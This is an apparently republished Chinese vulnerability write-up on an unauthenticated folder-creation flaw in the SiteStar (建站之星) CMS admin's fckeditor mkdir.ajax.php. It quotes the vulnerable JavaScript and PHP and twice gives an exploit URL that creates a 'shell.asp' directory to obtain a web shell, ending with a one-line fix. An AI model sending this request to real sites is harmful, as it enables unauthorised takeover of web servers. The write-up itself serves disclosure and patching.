电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

建站之星全版本后台通杀getshell -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    详细说明:

    然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,

    反复试了几次之后发现这个过滤是有延迟的,

建站之星全版本后台通杀getshell

。大概在0.1秒后 才会去掉。于是果断查看源码看函数:

    function addSort(obj) {

    $(obj).parent().find(‘span’).css(‘display’,'inline-block’);

    $(obj).css(‘display’,'none’);

    $(obj).parent().find(‘span > input:first’).focus();

    }

    function newDir(obj) {

    var pth = $(obj).prev().attr(‘value’);

    var basepth = $(‘#gtcurdir option:selected’).text();

    if (pth.replace(/^\s+|\s+$/g,”).length == 0) { //这里对定义的PTH变量进行了判断,(“/^\s+|\s+$/g,”),思路是 判断如果文本框内不算以上字符 长度等于0则继续执行.

    alert(“请输入字符”);

    $(obj).prev().focus();

    return false;

    } else {

    $.ajax({

    type : “GET”,

    dataType : “text”,

    url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,//这里直接发送url 基本类型+新文件夹名+文件夹名。

    success : function(response) {

    switch (response) {

    case ’0′:

    $(obj).prev().val(”);

    $(obj).parent().css(‘display’,'none’);

    $(obj).parent().parent().find(‘a’).css(‘display’,'inline-block’);

    $(‘’).appendTo(‘#gtcurdir’);

    break;

    case ‘-1′:

    alert(“文件夹已存在!”);

    $(obj).prev().focus();

    break;

    case ‘-2′:

    alert(“新建文件夹失败!”);

    break;

    }

    },

    error : function(response) {

    alert(“请求失败!”);

    return false;

    }

    });

    }

    看完函数 发现有一个很有意思的地方:

    url : “../mkdir.ajax.php?basedir=”+basepth+”&newdir=”+pth,

    这里直接post出去命令,

电脑资料

建站之星全版本后台通杀getshell》(https://www.unjs.com)。那么我们可否构造呢

    于是查看了这个脚本的源码:

   

    header(‘Conten-type:text/html; charset=UTF-8′);

    define(‘SSFCK’, str_replace(“\\”, “/”, dirname(__FILE__)));

    $adminRoot = str_replace(“\\”, “/”, substr(SSFCK, 0, -10));

    define(‘SSROOT’, str_replace(“\\”, “/”, realpath($adminRoot.”/..”)));

    $err = ’0′;

    $basedir = trim($_GET['basedir']);//这里直接GET来自前面那个urlpost来的变量

    $newdir = trim($_GET['newdir']);

    // is or not exist dir

    $hd = dir(“../../”.$basedir);

    while(($path = $hd->read()) !== false) {

    if ($path == $newdir) {

    $err = ‘-1′;

    break;

    } else continue;

    }

    if ($err != ‘-1′) {

    if (!mkdir(“../../{$basedir}{$newdir}”, 0755)) $err = ‘-2′;

    }

    echo $err;

    ?>

    程序员果然天然呆,不验证登陆,这里不验证文件名,任凭urlpost任意信息。

    到这里知道了程序漏洞所在。附上exp:

    http://localhost/admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp

    返回0则表示成功。

    漏洞证明

   

    " />

    http://localhost/admin/fckeditor/mkdir.ajax.php?basedir=upload/image/&newdir=shell.asp

    修复方案:

    对mkdir.ajax.php加验证

相关文章
最新文章
推荐文章

Copyright©2006-2026 优文网 unjs.com 版权所有 手机版